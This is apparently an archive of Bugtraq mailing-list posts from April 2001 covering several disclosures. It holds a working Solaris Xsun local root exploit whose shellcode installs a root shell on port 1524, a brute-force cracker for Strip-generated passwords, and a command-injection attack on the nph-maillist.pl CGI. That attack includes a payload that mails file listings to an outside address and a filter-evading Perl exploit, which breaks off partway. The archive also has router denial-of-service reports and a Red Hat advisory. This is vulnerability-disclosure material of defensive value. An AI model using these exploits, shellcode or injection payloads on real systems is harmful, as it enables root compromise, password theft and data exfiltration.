Solaris Xsun buffer overflow vulnerability

2001-04-11 Thread eEye Digital Security 

Solaris Xsun buffer overflow vulnerability

Discovered and exploited by:
Riley Hassell [EMAIL PROTECTED]

Release Date:
April 10, 2001

Systems Affected:
Solaris 7/8 (x86 and sparc)

Description:
Yet some more Solaris spring cleaning...

A buffer overflow was discovered in Xsun. Since Xsun is SUID root,
exploiting this vulnerability yields root privileges. The overflow exists in
Xsun’s handling of the HOME environment variable.

bash-2.03$ HOME=`perl -e 'print "A"x1050'`
bash-2.03$ /usr/openwin/bin/Xsun :1
Warning: There is no XDISPLAY information for display 1.
Server is using XDISPLAY information for display 0.
Default Font Path: /usr/openwin/lib/X11/
Segmentation Fault (core dumped)

Proof of Concept:

/***/
Solaris 7 (x86) /usr/openwin/bin/Xsun
HOME environment overflow

Proof of Concept Exploitation
[EMAIL PROTECTED]

Puts a Root shell on local port 1524
/***/

#include stdio.h
#include stdlib.h
#include string.h
#include unistd.h
#define BUFLEN  1041

/* seteuid/setuid/inetd shell */
char eyecode[] =
"\xeb\x51\x9a\x65\x65\x79\x65\x07\x90\xc3\x5e"
"\x29\xc0\x89\x46\xab\x88\x46\xb0\x89\x46\x0c"
"\x50\xb0\x8d\xe8\xe4\xff\xff\xff\x29\xc0\x50"
"\xb0\x17\xe8\xda\xff\xff\xff\x29\xc0\x88\x46"
"\x17\x88\x46\x1a\x88\x46\x78\x29\xc0\x50\x56"
"\x8d\x5e\x10\x89\x1e\x53\x8d\x5e\x18\x89\x5e"
"\x04\x8d\x5e\x1b\x89\x5e\x08\xb0\x3b\xe8\xb2"
"\xff\xff\xff\x90\x90\xc3\xe8\xb2\xff\xff\xff"
"\x90\x6b\x61\x6d\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x2f\x62\x69\x6e\x2f\x73"
"\x68\x20\x2d\x63\x20"
"echo \"ingreslock stream tcp nowait root /bin/sh sh -i\"/tmp/eeye;"
"/usr/sbin/inetd -s /tmp/eeye2001";

char buf[BUFLEN];
unsigned long int nop, esp;
long int offset = 0;

unsigned long int get_esp()
{__asm__("movl %esp,%eax");}

int main (int argc, char *argv[])
{
int i;
if (argc  1)
offset = strtol(argv[1], NULL, 0);
else
offset = -200;
esp = get_esp();
memset(buf, 0x90, BUFLEN);
memcpy(buf+800, eyecode, strlen(eyecode));
*((int *) buf[1037]) = esp+offset;
strncpy(buf[0],"HOME=",5);
putenv(buf);
execl("/usr/openwin/bin/Xsun", "eEye", ":1",NULL);
return;
}

Vendor Status:
Sun Microsystems has been contacted. They are currently working on patches
for this and other related vulnerabilities eEye has discovered. We would
like to thank them for working with us on creating a patch for this
vulnerability.

Workaround:
chmod –s /usr/openwin/bin/Xsun
This will remove the setuid bit from Xsun, therefore if someone does exploit
this vulnerability, they won’t gain higher privileges.

Greetings:
ADM, Lamagra, Zen-Parse, Loki, and Speakeasy Networks

Copyright (c) 1998-2001 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express consent of
eEye. If you wish to reprint the whole or any part of this alert in any
other medium excluding electronic medium, please e-mail [EMAIL PROTECTED] for
permission.

Disclaimer
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are
NO warranties with regard to this information. In no event shall the author
be liable for any damages whatsoever arising out of or in connection with
the use or spread of this information. Any use of this information is at the
user's own risk.

Feedback
Please send suggestions, updates, and comments to:

eEye Digital Security
http://www.eEye.com
[EMAIL PROTECTED]

BINTEC X1200

2001-04-11 Thread Johnny Cyberpunk 

Kai,

sorry for the less information if've given in the last post. here is the
detailed info.
if've proofed these exploits on two different BIOS Versions again some
minutes ago.

These BIOS are available for download at www.bintec.de for the Bintec X1200
Router.

First Version V5.1 Rev 6

nmap ip -sU -p '53-53'

This affects that the Router is booting.

It seems that the Router is vulnerable for a normal Port 53 UDP scan.

-

Second Version V5.3 Rev 1

nmap ip

Halts the System and Power off is nessessary.

Here is the Output :
--

[root@x /root]# nmap 192.168.0.1

Starting nmap V. 2.54BETA7 ( www.insecure.org/nmap/ ) # starting nmap
against bintech x1200
caught SIGINT signal, cleaning up   # after about 3 sec
[root@x /root]# ping c0r3   # trying to ping bintec x1200...
PING 192.168.0.1 from 192.168.0.22 : 56(84) bytes of data.  # no response...

--- 192.168.0.1 ping statistics ---
7 packets transmitted, 0 packets received, 100% packet loss
[root@x /root]#55 192.168.0.1 INET: dialup if 10001 prot 17
192.168.0.21:1034-205.188.153.102:4000


Apr  9 19:17:48 192.168.0.1 ACCT: INET: 09.04.2001 19:19:27 2 6
192.168.0.22:2100/1000 - 62.112.136.241:80/10001 24 3585 36 44513
Apr  9 19:17:48 192.168.0.1 ACCT: INET: 09.04.2001 19:19:27 0 17
217.80.196.15:1025/0 - 212.185.248.116:53/10001 1 63 1 173
Apr  9 19:17:48 192.168.0.1 ACCT: INET: 09.04.2001 18:57:37 1309 6
192.168.0.22:2092/1000 - 62.112.136.241:80/10001 24 12334 24 5727
Apr  9 19:18:10 192.168.0.1 ACCT: INET: 09.04.2001 19:19:47 0 17
192.168.0.21:1034/1000 - 205.188.153.102:4000/10001 2 76 1 38
Apr  9 19:18:32 192.168.0.1 ACCT: INET: 09.04.2001 19:20:11 0 6
192.168.0.22:2101/1000 - 62.112.136.241:80/10001 6 800 6 2170
Apr  9 19:18:32 192.168.0.1 ACCT: INET: 09.04.2001 18:57:37 1354 6
192.168.0.22:2093/1000 - 62.112.136.241:80/10001 23 10464 24 5554
Apr  9 19:18:54 192.168.0.1 ACCT: INET: 09.04.2001 19:20:26 1 6
192.168.0.22:2102/1000 - 62.112.136.241:80/10001 30 2139 48 63801
Apr  9 19:18:54 192.168.0.1 ACCT: INET: 09.04.2001 18:57:37 1369 6
192.168.0.22:2094/1000 - 62.112.136.241:80/10001 23 10570 23 5498
Apr  9 19:18:54 192.168.0.1 ACCT: INET: 09.04.2001 18:57:37 1370 6
192.168.0.22:2095/1000 - 62.112.136.241:80/10001 22 9835 22 5181
Apr  9 19:19:05 192.168.0.1 ACCT: INET: 09.04.2001 19:20:27 11 6
192.168.0.22:2103/1000 - 62.112.136.241:80/10001 7 1479 7 1452
Apr  9 19:19:05 192.168.0.1 ACCT: INET: 09.04.2001 19:20:38 1 6
192.168.0.22:2104/1000 - 62.112.136.241:80/10001 12 1285 13 13119
Apr  9 19:19:05 192.168.0.1 ACCT: INET: 09.04.2001 19:20:43 1 6
192.168.0.22:2105/1000 - 62.112.136.241:80/10001 21 1860 32 40868
Apr  9 19:19:16 192.168.0.1 ACCT: INET: 09.04.2001 19:20:48 0 17
192.168.0.21:1034/1000 - 205.188.153.102:4000/10001 2 76 1 38
Apr  9 19:19:38 192.168.0.1 ACCT: INET: 09.04.2001 19:21:15 3 6
192.168.0.21:1043/1000 - 64.4.13.235:1863/10001 9 449 7 381
Apr  9 19:20:53 192.168.0.1 ETHER: slot 1: Auto-negotiation done
(100BaseTx/halfdup)1  # after reboot

Re: BinTec X4000 Access Router DoS Vulnerability

2001-04-11 Thread Jan Münther 

Hi again,

bios 5.1 has the problem to reboot the router after nmap scan.

I hadn't seen any such effect, but that might have been due to the fact
I've installed the latest bootimage right from the start - a habit, I
guess.

new versions halt the complete system. to get it work again, you have
to
switch the power button on/off.

i seems that it depends on the count of simultanous threads scanning
against
the
router. not all nmap scans reboot or halt the router.

Not in this case. If you read my last mail containing the workaround,
you'd know it was due to a faulty (or better, incomplete) implementation
of the pptpd. It cannot process an incoming SYN flagged TCP packet and
consequently locks the machine up by consuming 100% CPU time.

Considering this, it's quite logical not all nmap scans cause a
lockup, since e.g. Null and FIN scans do not issue packets with the SYN
flag set. If you have licensed the VPN software, the pptpd is fully
functional and you're not going to encounter any of the problems.

BinTec has confirmed they're going to publish a new firmware image with
a _really_ disabled pptpd.




   which firmware release do you use on x1200 and x4000 exactly ?
   what's about 5.1.6P10 (for x4k) ?

Installed right from the start.


   the last one i used here (x1200, isdn/dsl, firmware 5.3.1)
   does not seem to have this problem...

I don't think you can compare the two directly. While all Bintec
routers I've seen so far provide a more or less similar UI, details of
the OS and feature implementation appears to differ a bit (at least
that's my impression from f***ing around a little).

   which kind of scan do you made ? nmap parameter ?
   please gimme more details...

Usually my first go is: nmap -sS -v -O hostname


i think the problem why bintec isn't fixing it, is that this company
is
nearly
ruined.


   i really don't think so...

Neither do I. While it's widely known that BinTec ran into some
financial problems during the last business term, they seem to do
pretty well at the moment. I'd say they were a bit delayed with the
release of their new products, but I don't think they're going down big
time. Especially their xDSL stuff seems to sell quite well and
consequently wins tests - that's what made me buy the X4000 ;o))

Cheers, Jan
--
Radio HUNDERT,6 Medien GmbH Berlin
- EDV -
[EMAIL PROTECTED]

Re: PIX Firewall 5.1 DoS Vulnerability

2001-04-11 Thread Siddhartha Jain 

Hi,

Could this vulnerability exist in other Cisco products using TACACS+ for
authentication? For eg. Cisco routers?

Siddhartha

From: "Claudiu Calomfirescu" [EMAIL PROTECTED]

 Description:
 
 An attacker from inside or outside interfaces of a
 PIX Firewall 515 or 520, 5.1.4 version running aaa
 authentication against a TACACS+ Server could
 cause the PIX to crash and reload by overwhelming
 it with authentication requests.



_
Do You Yahoo!?
Get your free @yahoo.com address at http://mail.yahoo.com

Re: AudioGalaxy Satellite - SPYware

2001-04-11 Thread Alex Arndt 

Greetings,

According to a quote posted on the CounterExploitation website
(http://cexx.org/webhancer.htm), this so-called SPYware is
designed to perform a specific client-side function: (FYI, the
CounterExploitation page includes detailed removal instructions...)

"webHancer Customer Companion resides on the end-user's computer,
where it transparently monitors Internet performance. webHancer
Customer Companion measures overall network/site delay and the
performance times experienced by actual end-users."

Here's another quote right from the webHancer site:
(http://www.webhancer.com/site/)

"webHancer measures web site performance from the perspective of
millions of end user desktops, giving e-businesses a window on the
levels of performance real people will tolerate."

Essentially, this is a distributed network performance monitoring
application - by including it in their software distribution, it
would appear AudioGalaxy is trying to keep tabs on the available
network BW to ensure quality service for their users.

IMHO their heart is in the right place but end-users should be given
the opportunity to opt out if they want to.

Alex Arndt, GCIA
PGP Fingerprint: 6AB4 C192 640A 93C0 A802 38B7 9FC5 1D14 F121 3E24

"Within all order is the potential for chaos..."

-Original Message-
From: Bugtraq List [mailto:[EMAIL PROTECTED]]On Behalf Of Derek
Reynolds
Sent: Sunday, April 08, 2001 1:37 PM
To: [EMAIL PROTECTED]
Subject: AudioGalaxy Satellite - SPYware


Wasn't sure if this topic has already come up.

Installing Audiogalaxy automatically installs a small tracking or "spy"
program called Webhancer. This program not only tracks where you go on the
Internet
but also reads files on your hard drives and sends info to some company.

snip

Best regards,
-Derek Reynolds mailto:[EMAIL PROTECTED]

Catastrophic failure of Strip password generation.

2001-04-11 Thread Thomas Roessler 

Executive summary: If you have ever used Strip for the Palm to
generate your passwords, change them.  Change them NOW.



Strip (Secure Tool for Recalling Important Passwords) is a nice
encrypted password notebook for the Palm; see
http://www.zetetic.net/products.html for details.

Strip-0.5 also features a function for generating passwords, which
certainly has some appeal to anyone who generates passwords
frequently.

However, this function has some flaws, one of which has the effect
to limit the number of different passwords strip can create to 2^16
per class (alphanumeric, alphabetic, numeric, ... with N
characters).

Generating this number of passwords and trying each of them with
crypt(3) is a matter of less than 3 seconds on a current PC running
Linux. 

The attached program can be used to demonstrate this in the case of
alphanumeric passwords containing 8 characters.  Just take your
encrypted, strip-generated password from /etc/shadow, and pass it as
the single command line argument.  (Covering the other classes of
passwords strip can generate is left as an exercise.)



The Flaws

- Strip uses the PalmOS SysRandom() function to generate the
  passwords.  SysRandom() is a very simplistic linear PRNG, which
  should most likely not be used for password generation.

- Strip tries to seed this PRNG with the result of TimGetTicks().
  TimGetTicks() returns the number of ticks (1 Tick = 10ms on
  current devices) since the last reset of your Palm.  The ticks
  counter is not incremented when the device is turned off.

  Obviously, small values for the TimGetTicks() result are much more
  likely than large values, so an attacker could just start at 0 and
  try any possible ticks value.  This kind of attack would already
  be quite successfull and efficient - at least against any
  passwords generated during the first couple of months of regular
  use of a PalmOS device after a reboot.

- The actual implementation has a bug which finally limits the
  search space to trivial dimensions: TimeGetTicks() returns a 32
  bit integer value, and the PRNG expects such a value as its seed.
  However, the return value from TimeGetTicks() is stored in a 16
  bit Int variable.

  Thus, the numbers 0, ..., 0x are the only seeds which will
  ever be used, limiting the number of possible passwords of any
  class to 2^16.


Credits

Thanks to Ian Goldberg for posting his (correct) take at the
SysRandom() function to coderpunks, and to Marc Haber for telling me
about Strip.


Cheers,
-- 
Thomas Roessler [EMAIL PROTECTED]


/*
 * Crack passwords generate by strip ("Secure Tool for Recalling
 * Important Passwords") for the Palm; see
 * http://www.zetetic.net/products.html for details.
 * 
 * Copyright (c) 2001 by Thomas Roessler
 * [EMAIL PROTECTED].
 * 
 * Use, distribute and modify freely.
 * 
 */

#include stdio.h
#include stdlib.h

#include string.h
#include crypt.h

/* The PalmOS SysRandom() RNG. */

static unsigned int multiplier = 22695477;
static unsigned int _seed = 0;

short palm_rand (unsigned int new_seed)
{
  if (new_seed)
_seed = new_seed;
  
  _seed = (_seed * multiplier) + 1;
  return (short)  ((_seed  16)   0x7fff);
}

/* 
 * Strip's password generation algorithm for the alphanumeric case - 
 * you can easily change this to cover the other cases as well.
 */

static char *alphas = "abcdefhijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
static char *numerics = "0123456789";

char *possible_password (unsigned int seed, int size)
{
  static char pwbuff[1024];
  char z[1024];
  int i, r;
  int valids;

  if (size  sizeof (pwbuff))
exit (1);
  
  sprintf (z, "%s%s",numerics, alphas);
  valids = strlen (z);
  
  r = palm_rand (seed);

  for (i = 0; i  size; i++)
  {
r = palm_rand (0);
pwbuff[i] = z[r % valids];
  }
  pwbuff[i] = '\0';
  
  return pwbuff;
}

/* check all possible passwords */

int main (int argc, char *argv[])
{
  int i;
  char *pw;
  
  for (i = 0; i = 0x; i++)
  {
pw = possible_password ((short) i, 8);
if (!argv[1] || !strcmp (argv[1], crypt (pw, argv[1])))
  printf ("%s\n", pw);
  }
  
  return 0;
}

 PGP signature

Re: Possible DoS to hosts running Veritas Netbackup

2001-04-11 Thread Eelco Duijker 

This vulnerability sounds exactly the same as the one in Veritas Backup
Exec Agent discovered in September 3, 1999 and re-discovered in January
15, 2001. This was posted to Bugtraq with ID 2204. This was posted to
the vendor, but until now I haven't seen a patch.

Eelco

[EMAIL PROTECTED] wrote:

 Possible DoS for hosts running Veritas Netbackup Client

Re: ntp-4.99k23.tar.gz is available

2001-04-11 Thread stanislav shalunov 

Chiaki Ishikawa [EMAIL PROTECTED] writes:

 Has anyone tested the exploit against embedded ntp implementations
 such as in Cisco router, for example, to see if the daemon would
 misbehave, etc.?

I couldn't do anything to the NTP implementation of a Cisco router
here with the stock "ntpdx" exploit as it was posted.  (It doesn't
crash, it doesn't exhibit same heap corruption as xntpd v3.)

Which, of course, doesn't mean IOS isn't vulnerable.

Crafting an exploit that would do something useful (as opposed to make
the router stop serving time) would be quite difficult though without
IOS internals knowledge, so there's some consolation here.

--
Stanislav Shalunov  http://www.internet2.edu/~shalunov/

Sex is the mathematics urge sublimated. -- M. C. Reed.

X4000 DoS: Details and workaround

2001-04-11 Thread Head of Research Dept. 

System affected:
---
BinTec X4000 Router

All firmware versions [as far as I know, only verified with latest
release 5.1.6 Patch 10]

Machines with activated additional VPN software license are *NOT*
affected, neither are machines which filter 1723/tcp.


Description:
---

As mentioned before, under the given circumstances the X4000 will lock
up after sending a SYN portscan to it. Further examination of the
phenomenon at BinTec has shown that sending a SYN flagged TCP packet to
port 1723 (pptp) will cause the machine to behave in the described way.

The pptp daemon should be activated only when the software license key
is entered and it can process incoming packets adequately.
However, it isnt. When the 'dormant' pptpd receives a SYN packet and
cannot process it, the daemon claims 100% CPU usage and the machine
locks up. This, of course, happens when a SYN portscan against the
machine is issued and port 1723 gets hit - you can also easily check it
with 'telnet my.machines.ip 1723' or your favourite packet injector.

Solution:


There are two solutions: One of them is less pricey than the other ;o))
If you wanted to buy the VPN software anyway, just go ahead and enter
the key.

If not, you should include a rule which drops 1723/tcp directed at all
interfaces of your router (as you should do anyway if you don't use
it).


Vendor response:
---

Some might remember a little bitter notion with my first mailing.
However, the day after I posted to Bugtraq the development director
contacted me. He was very eager to help and asked for my config file
and a stack trace, which I send them as quick as possible. He reassured
me that the problem was taken seriously, but mentioned that they could
not reproduce the phenomenon, so they would take a look at my config and
see what might have caused it. All this was yesterday.

Today, the leading developer (I assume) for the X4000's firmware called
me and was able to present the above solution. He had tried to
reproduce the DoS on a machine with VPN license first and only after a
long night got the idea that the pptp daemon might be the culprit (I
_did_ pity him).


Comment:
---

I hope you don't mind a personal comment. The sheer fact that I did not
get any response after first informing support staff of the issue
really upset me quite a bit. I really expected some reaction within
less than almost three weeks. Going public changed the response level
pretty quickly ;o) To be fair I have to state that all the staff I
talked to during the last few days were seeming absolutely competent
and very eager to help. Everyone involved stressed how sorry they were
about the delay and how unusual this was.

From my personal experience I could only say this is probably true,
since we've been using other BinTec products for years and they
generally performed very well, especially compared with products of
another, erm, well-known vendor.

As for my statement about the recently introduced money back warranty,
I could only say that I now do believe this was launched under the
assumption of a totally stable platform. They surely didn't know the
vulnerabilty.

No, I was not bribed to say this ;o))















--
Radio HUNDERT,6 Medien GmbH Berlin
- EDV -
[EMAIL PROTECTED]

[RHSA-2001:042-02] Updated pine packages available

2001-04-11 Thread bugzilla 

-
   Red Hat, Inc. Red Hat Security Advisory

Synopsis:  Updated pine packages available
Advisory ID:   RHSA-2001:042-02
Issue date:2001-03-31
Updated on:2001-04-09
Product:   Red Hat Linux
Keywords:  pine pico temporary file tmpfile symlink vulnerability race
Cross references:  
Obsoletes: 
-

1. Topic:

Updated pine packages are now available for Red Hat Linux 7.0, 6.2,
and 5.2.  These new updated packages fix temporary file creation issues
in the pine mail client and the pico text editor that comes with pine.

2. Relevant releases/architectures:

Red Hat Linux 5.2 - alpha, i386, sparc

Red Hat Linux 6.2 - alpha, i386, sparc

Red Hat Linux 7.0 - alpha, i386

3. Problem description:

Previous versions of the pine email client, and the pico editor have
had various temporary file creation issues that allow any user with
local system access, to cause files owned by anyone including root
to potentially be overwritten if the right set of conditions are met.

4. Solution:

To update all RPMs for your particular architecture, run:

rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade.  Only those
RPMs which are currently installed will be updated.  Those RPMs which are
not installed but included in the list will not be updated.  Note that you
can also use wildcards (*.rpm) if your current directly *only* contains the
desired RPMs.

Please note that this update is also available via Red Hat Network.  Many
people find this an easier way to apply updates.  To use Red Hat Network,
launch the Red Hat Update Agent with the following command:

up2date

This will start an interactive process that will result in the appropriate
RPMs being upgraded on your system.

5. Bug IDs fixed (http://bugzilla.redhat.com/bugzilla for more info):

20865 - Pine 4.30 crashes on certain folders
21158 - spell check ceases to function with pine-4.30-1.62
21271 - gpg encryption doesn't work with more than one recipients
21282 - Pine 4.30 File attach
22113 - Pine with new folders
23679 - pine corrupts outgoing mail
23952 - RFE: PinePGP 0.15.3
24902 - pine's filters fail to properly encrypt mail sent to multiple recipients 
(using gpg)

6. RPMs required:

Red Hat Linux 5.2:

SRPMS:
ftp://updates.redhat.com/5.2/en/os/SRPMS/pine-4.33-5.5x.src.rpm

alpha:
ftp://updates.redhat.com/5.2/en/os/alpha/pine-4.33-5.5x.alpha.rpm

i386:
ftp://updates.redhat.com/5.2/en/os/i386/pine-4.33-5.5x.i386.rpm

sparc:
ftp://updates.redhat.com/5.2/en/os/sparc/pine-4.33-5.5x.sparc.rpm

Red Hat Linux 6.2:

SRPMS:
ftp://updates.redhat.com/6.2/en/os/SRPMS/pine-4.33-6.6x.src.rpm

alpha:
ftp://updates.redhat.com/6.2/en/os/alpha/pine-4.33-6.6x.alpha.rpm

i386:
ftp://updates.redhat.com/6.2/en/os/i386/pine-4.33-6.6x.i386.rpm

sparc:
ftp://updates.redhat.com/6.2/en/os/sparc/pine-4.33-6.6x.sparc.rpm

Red Hat Linux 7.0:

SRPMS:
ftp://updates.redhat.com/7.0/en/os/SRPMS/pine-4.33-7.src.rpm

alpha:
ftp://updates.redhat.com/7.0/en/os/alpha/pine-4.33-7.alpha.rpm

i386:
ftp://updates.redhat.com/7.0/en/os/i386/pine-4.33-7.i386.rpm



7. Verification:

MD5 sum   Package Name
--
a43bf41fc31125aef0e9381b5c96d369 5.2/en/os/SRPMS/pine-4.33-5.5x.src.rpm
48e31aadaf4922e6fdb75fc98d627539 5.2/en/os/alpha/pine-4.33-5.5x.alpha.rpm
e1bd691d2c97442aad4dd1e33f88456a 5.2/en/os/i386/pine-4.33-5.5x.i386.rpm
c2a1b343ab45b8ff048a42fc3025a7cd 5.2/en/os/sparc/pine-4.33-5.5x.sparc.rpm
ef2aa8e5f064ccd1ba469e7ed563d1c6 6.2/en/os/SRPMS/pine-4.33-6.6x.src.rpm
3903e37155fe557b3e1f615f1b6f437c 6.2/en/os/alpha/pine-4.33-6.6x.alpha.rpm
56c85a7f1044e43030f5ee8bd0108515 6.2/en/os/i386/pine-4.33-6.6x.i386.rpm
8bcc1bf069db5ab4a2b8531ab3a5ac11 6.2/en/os/sparc/pine-4.33-6.6x.sparc.rpm
9aa9644934b290f1e55d6a2a96e3f12d 7.0/en/os/SRPMS/pine-4.33-7.src.rpm
b64337030032f68609db57faa1bb2ee5 7.0/en/os/alpha/pine-4.33-7.alpha.rpm
ef8d1e7d5a28b74a7a088ef67ed98dff 7.0/en/os/i386/pine-4.33-7.i386.rpm

These packages are GPG signed by Red Hat, Inc. for security.  Our key
is available at:
http://www.redhat.com/corp/contact.html

You can verify each package with the following command:
rpm --checksig  filename

If you only wish to verify that each package has not been corrupted or
tampered with, examine only the md5sum with the following command:
rpm --checksig --nogpg filename

8. References:

http://hacksware.com/projects/vuls/mon_pine.html


Copyright(c) 2000, 2001 Red Hat, Inc.

Re: [COVERT-2001-02] Globbing Vulnerabilities in Multiple FTP Daemons

2001-04-11 Thread Mike Gleason 

NcFTPd Server for UNIX from NcFTP Software is not vulnerable to the
pathname globbing buffer overflow described by NAI COVERT Labs advisory
(COVERT-2001-02) (which is also documented in CERT Advisory CA-2001-07).

Additionally, NcFTPd Server is not vulnerable to the globbing
denial-of-service bug mentioned recently (March 16) on BUGTRAQ.

Mike Gleason
NcFTP Software
http://www.NcFTP.com

(I apologize in advance if this message does not display correctly - I
disabled HTML mail format in Microsoft Outlook so hopefully there will
be no problems.)




 smime.p7s

Re: ntp-4.99k23.tar.gz is available

2001-04-11 Thread Crist Clark 

Chiaki Ishikawa wrote:

 Has anyone tested the exploit against embedded ntp implementations
 such as in Cisco router, for example, to see
 if the daemon would misbehave, etc.?

Cisco has said they are aware of the advisories and investigating the
issue. That's all I know. I do not have a convenient sacrificial Cisco
box at the moment... but I probabaly should go set one up for this
and other games.
--
Crist J. ClarkNetwork Security Engineer
[EMAIL PROTECTED]Globalstar, L.P.
(408) 933-4387FAX: (408) 933-4926

The information contained in this e-mail message is confidential,
intended only for the use of the individual or entity named above.  If
the reader of this e-mail is not the intended recipient, or the employee
or agent responsible to deliver it to the intended recipient, you are
hereby notified that any review, dissemination, distribution or copying
of this communication is strictly prohibited.  If you have received this
e-mail in error, please contact [EMAIL PROTECTED]

Re: multiple vulnerabilities in Alcatel Speed Touch DSL modems

2001-04-11 Thread Gerrie 

 -Oorspronkelijk bericht-
 Van: Bugtraq List [mailto:[EMAIL PROTECTED]]Namens Tom Perrine
 Verzonden: dinsdag 10 april 2001 9:33
 Aan: [EMAIL PROTECTED]
 Onderwerp: multiple vulnerabilities in Alcatel Speed Touch DSL modems


 -BEGIN PGP SIGNED MESSAGE-


 Subject: multiple vulnerabilities in Alcatel ADSL-Ethernet bridge
 devices

Just wondering, didn't you find 2 types of remote Denial of service?

1) if you send big ICMP packets
2) and certain types of portscans

See also:
http://www.securityfocus.com/frames/?content=/templates/archive.pike%3Flist%
3D82%26mid%3D164842
http://www.securityfocus.com/frames/?content=/templates/archive.pike%3Flist%
3D82%26mid%3D164999
http://www.securityfocus.com/frames/?content=/templates/archive.pike%3Flist%
3D82%26mid%3D165166


gtx,
Gerrie

Re: AudioGalaxy Satellite - SPYware

2001-04-11 Thread David Johnston 

Derek Reynolds wrote:
 Installing Audiogalaxy automatically installs a small tracking or "spy"
 program called Webhancer. This program not only tracks where you go on 
the Internet
 but also reads files on your hard drives and sends info to some company. 
Even
 after completing Audiogalaxy Satellite's rudimentary recommended 
uninstall method
 which involves manually deleting it's file folder, Webhancer was still on 
up

I asked Audio Galaxy about this, and got a polite letter from Michael 
Merhej [EMAIL PROTECTED]. According to Mr. Merhej, the install 
screens tell you that you're about to install WebHancer.  I also checked 
out the WebHancer site; they have a very clear privacy policy, and a PDF 
of a Deloitte  Touche audit of it.  They say that they only collect 
timing data, no personally identifiable information, do not allow third 
party correlations, and keep the data protected.

I'm not sure that Audio Galaxy or WebHancer deserve vilification; they 
both seem to have taken reasonable steps to protect privacy and to warn 
users of what they are doing.  

Regards,

David Johnston
Little Bald Consulting
[EMAIL PROTECTED]

References:
Privacy policy at www.webhancer.com/site/products/privacy/

Deloitte  Touche audit at 
/site/products/privacy/assert/Report-final2.pdf

CGI - nph-maillist.pl vulnerability...

2001-04-11 Thread Kanedaaa Bohater 

Hello BuGReaders...

##Script: nph-maillist.pl[cgi]

##Introduction:

cat from source

Created by: Matt Tourtillott
URL: www.marketrends.net  email [EMAIL PROTECTED]

The email list generator is a web interfaced script that allows the visitors
on your web site to leave their email address so they may be notified when you
update your web site.
This script also provides the the ability to create and change the message you
wish to send to your list right from the web browser as well as to maintain
the list being generated.

There are two parts to the script. the nph-maillist.pl file carries all the
functionality for the web interface and the mailengine.pl is the work horse
that runs in the background until all of the list is emailed.

/cat

##Tested Version: 3.0 , 3.5

In mailengine.pl we can find somethink like this:
[very small cut]...
$mailprog="/usr/sbin/sendmail";
$mailfile = "mail.txt";
open (BSS, $mailfile) || die "Cannot open $mailfile";
@mailf = BSS;
close (BSS);
foreach $SIZE (@mailf) {
$SIZE =~ s/\n//g;
open (MAIL, "|$mailprog $SIZE") || die "Cannot open $mailprog";
...

Where $mailfile is file with emails adress... [not in PostgreSql format ;]
If We send our email adress like:
[EMAIL PROTECTED] ;ls -al /etc|mail [EMAIL PROTECTED]
and We post mailengine.pl we can run our commands :]
Ok.
But in maillist.pl We can find:
...
if ($FORM{'emailaddress'} !~ /\@/) { bad_email();}
if ($FORM{'emailaddress'} !~ /\./) { bad_email();}
if ($FORM{'emailaddress'} =~ /\ /) { bad_email();}
if ($FORM{'emailaddress'} =~ /\)/) { bad_email();}
if ($FORM{'emailaddress'} =~ /\(/) { bad_email();}
if ($FORM{'emailaddress'} =~ /\:/) { bad_email();}
if ($FORM{'emailaddress'} =~ /\//) { bad_email();}
if ($FORM{'emailaddress'} =~ /\\/) { bad_email();}
if ($FORM{'emailaddress'} =~ /\http:/) { bad_email();}
...
Where emailaddress is posted emailaddress ;]]...
We must add @ and . ... This is no problem :]
We like characters " ","/","\" ... and We cant use them... Argh..
But... :]
Author  dont parse " ` " character :]]
We can change our "/" in command `head -n1 nph-maillist.pl|cut -c3` :]]
Yes i know. We cant use " " ... but we can use "\t" [tabs] :]
If we change "/"  in `head\t-n1\tnph-maillist.pl|cut\t-c3' that
nph-maillist.cgi accept this email :
When We can change / , We can change any "BAD" characters in our good
characters ;]]
... and runs our commands ... :] Thats all...

Simple exploit in perl:

---
#!/usr/bin/perl
# nph-maillist hack... Kanedaaa  [ [EMAIL PROTECTED] ]
# its add crazy @email, sends mails, and execute our code of coz ;]
#
# greetzzz to all of Bohatery... [Breslau Kilerz, Lam3rz, my Mom, dog,
# hamster... maybe this is not hamster..., wine, SobiechOS, wine, Cucumber
# Team Members... yeah. i must go sleep. ;]
# and #phreakpl, #hackingpl :]
#
# . remember thats just simple sploit... You cant play in koules this.. ;]
use Socket;

# Ip...
$ip="127.0.0.1";

# Command to run ...
$command = 'ls -al|mail [EMAIL PROTECTED]';

#
if (!$ARGV[0]) {
print "nph-maillist hack... Kanedaaa  [kaneda\@ac.pl]\n";
print ".Use the force, edit source...[ ip  command ]\n";
print "\n";
print "1:./nph-maillist-ogorek.pl send - add our special \@email to the list.\n";
print "2:./nph-maillist-ogorek.pl hack - sends emails from list and execute our 
code.\n";
}

if ($ARGV[0] eq "send") { send }
if ($ARGV[0] eq "hack") { hack }


sub send
{
###
# You cant add this BAD chars... but we can hack this ;]
#" "")" "(" ":" "/" "\" "http:"
###
# Hack the "/" problem... change "/" - `head -n1 nph-maillist.pl|cut -c3`
#
$command =~ s/\//`head -n1 nph-maillist.pl|cut -c3`/g;
#
# Hack the ":" problem... change ":" - `grep ntent-type nph-maillist.pl|tail -n1|awk 
-F "type" {'print $2'}|cut -c1`
#
$command =~ s/:/`grep ntent-type nph-maillist.pl|tail -n1|awk -F "type" {'print 
\$2'}|cut -c1`/g;
#
# Hack the "\" problem... change "\" - `grep BGCOLOR nph-maillist.pl|tail -n1|awk -F 
"=" {'print \$2'}|cut -c1`
#
$command =~ s/\\/`grep BGCOLOR nph-maillist.pl|tail -n1|awk -F "=" {'print \$2'}|cut 
-c1`/g;
#
# Hack the "(" problem... change "(" - `grep scalar nph-maillist.pl|tail -n1|awk -F 
"scalar" {'print \$2'}|cut -c1`
#
$command =~ s/\(/`grep scalar nph-maillist.pl|tail -n1|awk -F "scalar" {'print 
\$2'}|cut -c1`/g;
#
# Hack the ")" problem... change ")" - `grep unlink nph-maillist.pl|awk -F "jobx" 
{'print \$2'}|cut -c1`
#
$command =~ s/\)/`grep unlink nph-maillist.pl|awk -F "jobx" {'print \$2'}|cut -c1`/g;


###
# Change ascii to hex...
$command =~ s/([^\w\!*-])/sprintf("%%%02X",ord($1))/ge;
#
